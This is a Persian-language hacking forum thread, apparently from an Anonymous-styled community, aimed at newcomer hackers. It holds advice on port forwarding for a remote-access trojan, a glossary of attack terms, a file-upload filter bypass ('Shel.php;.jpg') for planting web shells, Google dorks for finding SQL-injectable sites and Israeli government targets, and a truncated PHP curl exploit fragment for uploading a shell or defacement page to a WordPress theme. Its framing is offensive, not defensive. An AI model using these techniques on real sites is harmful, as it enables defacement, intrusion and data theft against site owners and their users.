پرش به


تصویر
* * * * * 2 رای

[ تاپیک هکر های تازه وارد ]


  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
119 پاسخ برای این موضوع

#943 ارسالی 16 مارس 2015 - 11:18

OnE_H4Ck3R
+760
    OFFLINE
    تاریخ عضویت :
    26 فوریه 2015
  • %100██████████
  • Anonymous
  • 769 ارسال
    Last Visit یک هفته قبل
  • Slogan : گرگ ها هرگز رام نمیشوند ، پس از ترک بترس
  • Country :
  • Gender : Not Telling
  • Location : tabriz
  • Name : ANONYMOUS

*
پست محبوب

با سلام

در این تاپیک سوالات خود را در مورد امنیت و راههای مقابله با نفوذ بیان کنید .

 

نکات لازم به توجه :

 

1. قبل از ارسال سوال از گزینه سرچ استفاده کنید چون ممکنه سوال شما قبلا مطرح شده باشد

 

SEARCH

 

2. از ارسال سوالاتی همچون چگونه هکر شویم و Hack را از کجا شروع کنیم بپرهیزید و طبق پستهای اموزشی زیر شروع کنید :

 

Hack رو از کجا شروع کنم؟

چگونه هکر شویم؟

راهنمایی دوستان تازه کار

 

3. از ارسال پستهای اسپم اکیدا خودداری فرمایید که با توجه به نوع تخلف با یوزر خاطی برخورد میشود.


ویرایش شده توسط Mr.khatar 13 ژانویه 2016 - 05:53 .
ویرایش به دلیل پاره ای تغییرات

تصویر


ادعای هکری ندارم پس خواهشا شاخ نشو

We Are Anonymous


#2 ارسالی 08 مه 2015 - 02:33

    OFFLINE
    تاریخ عضویت :
    04 مارس 2015
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 3 ارسال
    Last Visit ژوئیه 02 2015 10:56
  • Slogan : HACKER FOR EVER
  • Gender : Male
  • Location : internet

میشه فیلم اموزشی port mapping واسه adsl IP link رو بزارین چون هیچ جا پیدا نکردم ! ( واسه ویروس rat میخوام ) :D:):D


  • setita این پست را پسندیده است

#3 ارسالی 08 مه 2015 - 07:59

rising
+417
    OFFLINE
    تاریخ عضویت :
    19 مارس 2015
  • استاد هک و امنیت شبکه
  • Anonymous
  • 94 ارسال
    Last Visit ژوئن 16 2016 09:52
  • Slogan : شانسم رو خودم میسازم
  • Country :
  • Gender : Male
  • Location : کرج
و

 

اگر برای استفاده از rat میخوایین ، اون چیزی که شما دنبالش هستین Port Forwarding هستش.

لطفا مدل ای دی اس الی که میخوایین روش پورت راتتون رو فوروارد کنین به سمت سیستم عامل ، بگین تا طبق گزینه ها وآپشن هایی که داره بهتون مسیرش رو بگم تا بتونین وارد اون قسمت بشین. 


آموزش کامل متاسپلویت

بچه ها فقط مصرف کننده ی مطالب نباشین !!!

ما اینجا یه گروه هستیم ، همدیگه رو اینجا ملاقات میکنیم که دانستنی هامون رو به اشتراک بذاریم ;)


#4 ارسالی 09 مه 2015 - 02:58

    OFFLINE
    تاریخ عضویت :
    04 مارس 2015
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 3 ارسال
    Last Visit ژوئیه 02 2015 10:56
  • Slogan : HACKER FOR EVER
  • Gender : Male
  • Location : internet

IP link 


  • setita این پست را پسندیده است

#5 ارسالی 11 مه 2015 - 04:32

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

در زیر سعی دارم برخی از اصطلاحات کاربردی دنیای Hack و امنیت را بیان کنم که دوستان در هنگام مواجه با این اصطلاحات مشکل پیدا نکنند.
TCP PORT : البته نمی خواهم درس بدم . بیشتر برای اشنایی می باشد.یک مثال میگویم : این نوع پورت ها مانند برقراری ارتباط تلفن می باشد که شما می دانید دارید با چه کسی صحبت مینید و از درستی ارسال پیام ها مطمئن هستید
UDP Port : مانند ارسال نامه می باشد که شما مطمئن نیستید حتما میرسد یا نه یا ایا کسی که این را باز می کند همان شخص مورد نظر شماست
Social Engineering : البته در این مورد ایرانی ها بسیار موفق هستند. مهندسی اجتماعی به قول خودمان مخ زدن هست که به این طریق اطلاعاتی از شبکه بدست بیاوریم
War Dialing : شماره گیری جنگی. البته این مورد در ایران کمتر مفید میباشد.این کار برای پیدا کردن مودم هایی با تنظیم غلط استفاده میشود
TraceRoute(tracert) : البته بسیاری این اصطلاح را به خوبی میدانند ولی برای کسانی که آشنایی ندارند بگویم که بیشتر برای بدست آوردن جهش ها بین شما تا هدف استفاده میشود.البته مبحث تکنیکی دارد که باید در کتب تی سی پی / ای پی بخوانید
TCP Control Bits(ACK-SYN-FIN) : اینو هم باید در همان کتاب ها پیدا کنید ولی به طور خلاصه در ایجاد یک جلسه از این پادامتر ها استفاده میشود و چندین روش بر اساس همین بیت ها برای اسکن پورت وجود دارد.
Victim : قربانی. یا به قول خودمون کسی که مورد حمله قرار میگیرد
Overflow : همان طور که از اسمش بر میاد یعنی سرریز(البته اقای اینپرایز عزیز در جایی بحث در باره ته ریز کردن که خیلی دوست دارم بیشتر توضیح بدهند)کلا وقتی که دستوری مقدار داده ای که باید به حافظه نگاشت کند را با مقدار حافظه تخصیص داده با ان چک نکند این خطا روی میدهد.
Stack Overflow : همان بالایی هست
Buffer Overflow : همان بالایی هست البته مباحث تکنیکی دارد که در این مقاله چند خطی نمیتوان توضیح داد.
Shell Code : کد اجرایی که بعد از سرریز اجرا میشود و به زبان اسمبلی نوشته میشود
Cross Site Script : معنی کاملی دارد ولی برای توضیح بیشتر بگویم که اگر شما ایرادی که همین چند وقت پیش افراد و گروه های ایرانی در یاهو یا هاتمیل پیدا کرده اند از همین روش میباشد . یعنی به کمک مشکلات در برخی برنامه های تحت وب می توانند کد خود را اجرا یا اطلاعات مفیدی بدست اورند.
SQL Injection : اینم تو گروه بالا به حساب می اید و همان طور که در ایراد پی اچ پی دیدید به کمک تزریق اس کیو ال باعث لو رفتن اطلاعات میشد.این کار به کمک کاراکتر های خاص صورت میگیرد مانند
( ; ' , ` * % _ ,.......)
Sniffing : ردیابی یا گوش دادن به عبوری های داخل شبکه.البته این کار فقط درون شبکه صورت میپذیرد
ردیاب برنامهایی است که ترافیک شبکه محلی را جمع اوری میکند.
ARP : به کتب تی سی پی / ای پی مراجعه شود
Session Hijacking : سرقت نشست.یعنی اینکه شما دازید مثلا با کسی تلنت میکنید و هکری که در شبکه محلی شما هست ارتباط شما را با ان یکی قطع کند و با شما ادامه جلسه بدهد.
Man-in-the-middle/Monkey in the middle : این موضوع بیشتر در باب جلسات ایمن شده استفاده میشود. برای درک چگونگی این عمل کتاب شبکه های کامپیوتری فصل لایه کاربرد مطالعه شود.
DoS: Denial of Service : تکذیب سرویس.
ِDDoS : ماهیت بزرگتر از قبلی دارد ولی همان کار هست
Amplification Attack : تقویت حمله رد سرویس
Malformed Packet : بسته ناهنجار. یعنی شما بسته ایی را ارسال کنید که به صورت استاندار نباشد
RootKit : نسل بسیار پیشرفته ایی از ویروس ها که بر روی قایل های سیستم می نشینند و به سادگی قابل یافتن نیستند( ویروس کش های به روز میشناسند)
Kernel Level Rootkit : بسیار مخوف تر از مورد قبل این ویروس ها خود را به کرنل الصاق میکنند و دارای قدرت بالایی میشوند.
tunnel : حالا هر نوع تونلی که دوست دارید میتواند باشد مثلا یک تروجان که به جای باز کردن پورت از همان پورت های باز سیستم استفاده میکند
SteganoGraphy : برای مخفی کردن داده ها درون تصاویر به کار میرود
Network Based IDS : ای دی اس مبتنی بر شبکه.
Host Based IDS : ابزار مبتنی بر ای دی اس میزبان محدوده وسیعی از اختیارات و توانایی ها را در بر میگیرد.قاعدع اصلی این است که این ابزار بر روی میزبان مقیم شود و رویداد ها را از دیدگاه سیستم عامل کامپیوتر مشاهده کند.هنگامی که اتفاقی روی داد ان را بر اساس قواعد خود مقایسه کند و اگر شبیه ی را مشاهده کرد اطلاع دهد.
البته اینها مواردی بود که این بنده ذکر کردم اگه بازم بود دوستان و استادان عزیز کامل کنند تاپیک بعدی هم تقریبا در همین مورد است


Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم


#6 ارسالی 11 مه 2015 - 04:33

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

خوب خیلی ساده اصطلاحات مهم رو توضیح میدم و در ضمن روی مطلب بالا خیلی نمی خواد دقت کنید و کامل همرو حفظ کنید

 

فقط گفتم که بخونید smile.png خخخ

 

خوب بریم سراغ اصطلاحات:

==============================================================================

    تارگت/Target

 

همونجور که از اسمش معلومه به سایت یا سرور یا هرچیزی که ما قصد نفوذ یا Hack آن را داریم میگویند تارگت.

==============================================================================

Deface/دیفیس

 

فرض کنید شما سایتی را Hack میکنید و می خواهید اثبات کنید که شما به سایت نفوذ کردید یکی از این کار ها تغییر چهره سایت

یا هر نوع تغییر دریگه مثل گذاشتن عکس در صفحه اصلی سایت یا نوشته ای مانند:

HACKED BY Anonymous sec!

یا هرچیزه دیگری که باعث تغییر در سایت شود را اصطلاحا دیفیس مینامند

==============================================================================

Admin Page/ادمین پیج

 

صفحه ای که مدیر سایت یوزر و پسورد مربوط خود وارد میکند و به پنل مدیریت سایت دسترسی پیدا میکند

مثال:

شما سایتی را Hack میکنید و یوزر و پسورد سایت رو درمیارید به اونجایی که شما باید این یوزر پسورد را وارد

کنید ادمین پیج میگویند

==============================================================================

Bug/باگ

 

به زبان ساده راه Hack کردن سایت یا روش نفوذ به سایت رو باگ میگن

معنی اصلیه باگ یعنی حفره امنیتی

==============================================================================

Exploite/اکسپلوایت

 

به کد هایی که توسط برنامه نویسان و هکران برای حمله یا نفوذ به باگ های کشف شده نوشته میشوند را اکسپلوایت می گویند

 

ساده تر نمیتونم بگم دوستان دیگه اگه تونستن ساده تر توضیح بدن دریق نکنن

==============================================================================

MD5

 

به پسوردی که به صورت رمزنگاری شده باشد ام دی هش میگویند

 

مثلا شما از طریق باگ اس کیو ال رمز سایت را در میاورید ولی رمز به صورت عجیب غربی نوشته شده است

 

مثلا به این شکل:

a:12412dasjhf8921:421%:23235;12

نوشته شده

در صورتی که رمز

12345

است

یعنی

12345

به

a:12412dasjhf8921:421%:23235;12

تبدیل شده است

و برای رمز نگاری این نوء پسورد ها به سایت هایی مانند

hashkiller.com

و ...

مراجعه میکنید حالا نخواستم طریقه کرک کردن

MD5

رو آموزش بدم ولی دیگه خیلی رفتم عذر می خوام گرچه کرک کردن این نوء رمز نگاری ها هم زیاد سخت نیست

البته غیر تخصصیش

!!!

==============================================================================

Bypass/بایپس

 

به زبان ساده یعنی دور زدن سایت و پایگاه داده

 

مثلا شما می خواهید شلی در سایت آپلود کنید سایت فقط به شما اجازه آپلود فایل با فرمت

jpeg

میدهد و شل شما فرمت پی اچ پی دارد برای اینکار شما میتوانید فایل شل خود را با ندپد باز کرده و با فرمت

jpg

سیو کنید و اسم فایل خود را به این شکل تغییر دهید:

Shel.php;.jpg

و آپلودر سایت را دور زده و شل خود را ران کنید یا اجرا کنید

گرچه در بعضی موارد شل ران نمیشود یا شل آپ نمیشود با این روش که اونوقت روشی های تخصصی تری هست

که باید آنهارا امتحان کنید برای مبحث بایپسینگ هم مفصل صحبت میکنیم و راه و روش های زیادی

ارائه خواهیم داد فعلا تا اینجا مبحث بای پسینگ خوبه انشالله بیشتر هم توضیح خواهیم داد

...

==============================================================================

Shell/شل

 

به صفحه پی اچ پی که توسط هکر روی سایت آپلود میشه و هکر توسط اون میتونه کار های زیادی رو سایت یا سرور انجام بده

 

کار هایی از جمله مس دیفیس کردن سرور یعنی هرچه سایت روی سرور وجود دارند دیفیس میشوند گرفتن فایل کانفیگ

 

که اطلاعات خوبی در آن ذخیره شده است گرفتن دسترسی روت به سرور و

...

آپلود شل یکی از کار های مهمی است که یک هکر بعد از نفوذ به سایت انجام میده

==============================================================================

Data Base/دیتابیس

 

به زبون ساده دیتابیس نقش مغز سایت رو داره وتمام اطلاعات سایت درون آن ذخیره شده

==============================================================================

CMS/سیستم مدیریت محتوا

 

سیستم مدیریت محتوا مثل وردپرس جوملا و غیره ساده تر از این نمیتونم توضیح بدم

==============================================================================

این اصطلاحات رو به دقت بخونید و یادبگیرید

 

در آینده بیشتر درموردشون حرف میزنم و توضیح میدم

فدای تمام بچه های گروه ناشناس!

 

با تشکر


Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم


#7 ارسالی 11 مه 2015 - 04:33

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

لیست اکثر تکنیک ها Hack سایت

البته کامل نیست

پست بالایی رو اشتباهی دوبار سند کردم گفتم ویرایش کنم اینو بزارم

 

فقط صرف خوندن که با اسماشون فقط آشنا شید نمی خواد همه رو بیاموزید یا چیزی فقط زاشتمکه بخونید همین 

* Arbitary File Deletion
* Code Execution
* Cookie Manipulation ( meta http-equiv & crlf injection )
* CRLF Injection ( HTTP response splitting )
* Cross Frame Scripting ( XFS )
* Cross-Site Scripting ( XSS )
* Directory traversal
* Email Injection
* File inclusion
* Full path disclosure
* LDAP Injection
* PHP code injection
* PHP curl_exec() url is controlled by user
* PHP invalid data type error message
* PHP preg_replace used on user input
* PHP unserialize() used on user input
* Remote XSL inclusion
* Script source code disclosure
* Server-Side Includes (SSI) Injection
* SQL injection
* URL redirection
* XPath Injection vulnerability
* EXIF
* Blind SQL injection (timing)
* Blind SQL/XPath injection (many types)
* 8.3 DOS filename source code disclosure
* Search for Backup files
* Cross Site Scripting in URI
* PHP super-globals-overwrite
* Script errors such as the Microsoft IIS Cookie Variable Information Disclosure


Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم


#8 ارسالی 11 مه 2015 - 04:37

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

*
پست محبوب

خوب سلام خدمت همه بور بچ گل !

 

تو این پست می خوام نحوه ساخت دورک رو بهتون یاد بدم خوب در اول کار توضیح بدم که دورک چیست ؟

 

به هر چیزی که شما درون متور های جست و جو گری مانند :Google,Bing,Yoozو ... وارد کنید دورک میگویند

 

به اصطلاح هکر ها دورک وسیله یا نوشیته یا کدی است برای پیدا کردن تارگت ها و ...و شما برای Hack کردن سایت

 

مجبورید دورک بنویسید و اینکار بسته به خلاقیت خودتان دارد که می خواهید تحت کدام باگ دورک بنویسید

 

خوب حالا ساختار دورک رو براتون شرح میدم:

 

کلمات کلیدی وجود دارد که شما باید آنهارا یاد بگیرید هر کلمه و عبارت دستور خاصی به متور جست و جو گر میدهد و هر کدام محدودیت هایی برای آن مشخص میکند

 

در این پست با تمامآنها آشنا خواهید شد:

 

ما برای توضیحات متور جست و جوگر گوگل را در نظر میگیریم

 

1.خوب عبارت اول :inurl:/admin/login.php خوب این عبارت به گوگل می گوید که سایت هایی که آخر آدرسشان/admin/login.php است را پیدا کند در اصلعبارت inurl گوگل را محدود

 

به قسمت خاصی از آدرس سایت ها میکند.

 

2.عبارت دوم عبارت intext:"HACK BY Anonymous sec":خوب این عبارت به گوگل می گوید که سایت هایی که درون صفحه آنها جمله HACKED BY anonymous sec وجود دارد را

 

پیدا کن در اصل عبارت intext جست و جوگر را محدود به نوشته خاصی درون صفحه سایت میکند (درون هر صفحه ای از سایت)

 

3.عبارت سومintitle:"HACKED BY Arshia [email protected]":خوب این عبارت به گوگل میگوید که سایت هایی که عنوان آنهاHACKED BY Arshia Dangre است را بیاب

 

در اصل عبارت intitle گوگل را محدود به عنوان سایت ها میکند.

 

4.عبارت site:.gov.il:عبارت site:.gov.il به گوگل میگوید که سایت هایی با دامنه il(رژیم صهیونیسم)هستند را پیدا کن سایت ها دولتی این کشور !!! پس عبارت site:. هرچی

 

محدود کننده دامنه کشور هاست مثلا گاهی اوغات شما فقط می خواهید سایت های یک کشور خاص را مورد حمله قرار دهید برای این کار نیاز به عبارت site: دارید.

 

5.عبارت filetype:.pdf:این عبارت به گوگل میگوید سایت هایی که فایل های بافرمت PDF هستند را بیاب این سایت ها معمولا وقتی بازشان کنید فایل با فرمت مشخصی شما دانلود میشود

 

پس عبارت filetype هم برای محدود کردن فرمت فایل های قابل دانلود استفاده میشود.

 

 

خب تا اینجا تقریبا مهمترین و کارامد ترین عبارات برای دورک نویسی رو آموختید

 

خوب حالا پیش خودتون میگید که چجوری میتونیم در یک دورک چند محدودیت به گوگل دهیم؟

 

خو خیلی ساده است شما با دو کار می توانید این عمل را انجام دهید

 

راه اول:فاصله گذاشتن بین عبارت قبل و عبارت بعد مانند دورک زیر:

 

 

خوب ما با نوشتن این عبارت سه محدودیت به متور جست و جوگر خود دادیم که عبارتند از:

 

1.سایت هایی که آخر آدرس آنها /admin/login.php داشته باشد

2.سایت ها با دامنه .en باشند.

3.درون صفحه ای از سایت متن Welcome Admin وجود داشته باشد

 

خوب ما با این کار و با فاصله انداختن بین عبارات می توانیم یک دورک با چند محدودیت بسازیم!!!

 

خو راه دوم یه خرده طولانی تر از راه اول است به هر حال میگم فقط صرف گفتن :

 

راه دوم:این است که یک فاصله بین دو عبارت و حرف & و یک فاصله دیگر با عبارت بعد داشته باشد مانند دورک زیر:

 

inurl:/admi/login.php & site:.en & intext:Welcome Admin

 

بنظرم اینجوری فقط دورک خوشکل میشهD:

 

خوب همونطور که میدونید هر باگ دورک خاص خودشو رو داره

 

و شما باید طبق آشنایی که از اون باگ دارید واسش دورک بنویسید که این دیگه مبحثش جداستD:

 

من یه نمونه از این باگ هارو براتون مثال میزنم ولی دورک هارو زیاد توضیح نمیدمD:

 

خوب اول باگ sql injection رو مثال میزنم باگی پر از دورک های متفاوت و باگی کار آمد گرچه دیگه زیاد مد نیست ولی خیلی ها هنوز با sql injection Hack میکنن!!!

 

هر هکری معمولا با این باگ آشنایی داره بنظرم واسه دورک نویسی از این باگ شروع کنید و برای این باگ دورک بنویسید (البته نظر شخصیه بنده این است)

 

خوب یه نمونه مثال این دورک:

 

 

inurl:news.php?id= & intext:"Warning: mysql_num_rows() & site:.gov.nasa

 

ترجمه اش رو خودتون بهتر بلدین بنظرم همین یه مثال واسه الان کافی باشه چون میترسم اگه بیشتر مثال بزنم گیج بشید

 

خوب دیگه انگشتام داغون شدن بسکی تایپ کردمD:

 

یه فایل هم ضمیمه میزنم فایل دامنه سایت ها تمام کشور هاست!!!

 

فقط دوستانی که مطلب یه خورده به دردشون خورد تشکر فراموش نشهD;

 

استادات و دوستان بزرگوار اگه مطلبی نکته ای چیزی جا انداختم لطفا کامل کنیدD:;

 

فایل ضمیمه پیوست شد

 

با تشکر فراوان دوستان برای این متن زحمت کشیده شده لطفا برای کپی منبع فراموش نشه:http://www.anonymous-sec.org/


Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم


#9 ارسالی 11 مه 2015 - 04:38

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

سلام مجدد توی این پست هم یه مثاله تقریبا کوتاه و مفید و گیرا

 

واستون ضمیمه کردم از باگ پر استفاده و پر ارزش اس کیو ال

 

همونطور که در تاپیک قبل گفتم فک کنم ارزش اس کیو ال رو فهمیده باشیدD;

 

بدلیل حجم آپلودر خیلی پایین فایل تو پیکو فالی آپ شد ... شرمنده اقای خطر!

 

===========================================================================

لینک دانلود :http://s6.picofile.c...l_injection.pdf

===========================================================================

 

با تشکر !


  • setita این پست را پسندیده است

Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم


#10 ارسالی 11 مه 2015 - 04:39

Arshia Danger
+821
    OFFLINE
    تاریخ عضویت :
    09 مه 2015
  • Danger Hacker
  • banned
  • 927 ارسال
    Last Visit ژوئیه 07 2016 01:06
  • Slogan : Fln bye team Id Tele : G0leman
  • Country :
  • Gender : Male
  • Location : تهران
  • Name : AloNe

سلام
دیفیس یا اپلود شل
آموزش :



1 - Search The Google

inurl:"wp-content/themes/RightNow/"

2 - استفاده از اکسپلویت زیر که با اون میتونید شل یا صفحه دیفیس خودتون رو آپلود کنید !!!

"@$uploadfile", 'folder'=>'/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

3 - مسیر دیفیس یا شل که اپلود کردید

http://www.target.co.../galleryimages/

با تشکر!!


Bye From Team Tnx All Members


contact Arazel Bax: @baxarazel


bye all


بیاین چنل ما خوشحال میشیم





0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP